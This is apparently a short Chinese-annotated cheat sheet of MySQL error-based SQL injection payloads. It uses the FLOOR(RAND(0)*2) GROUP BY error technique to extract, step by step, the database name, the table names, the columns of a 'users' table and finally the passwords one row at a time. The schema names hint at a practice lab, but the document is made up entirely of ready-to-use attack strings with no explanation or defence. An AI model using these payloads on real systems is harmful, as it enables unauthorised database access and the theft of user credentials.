- AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT
CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES
WHERE table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.TABLES GROUP BY x)a) //库名
- AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT
CONCAT(CAST(group_concat(table_name)AS CHAR),0x7e)) FROM
INFORMATION_SCHEMA.TABLES WHERE table_schema=‘security’ LIMIT
0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
//表名
- AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT
CONCAT(CAST(group_concat(column_name)AS CHAR),0x7e)) FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_name = 'users' and
table_schema = 'security' LIMIT 0,1),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.TABLES GROUP BY x)a) //列名
- AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT
CONCAT(CAST(CONCAT(password) AS CHAR),0x7e)) FROM security.users
LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY
x)a) //数据(这个构造数据只能一个一个爆出来,通过limit函数控制)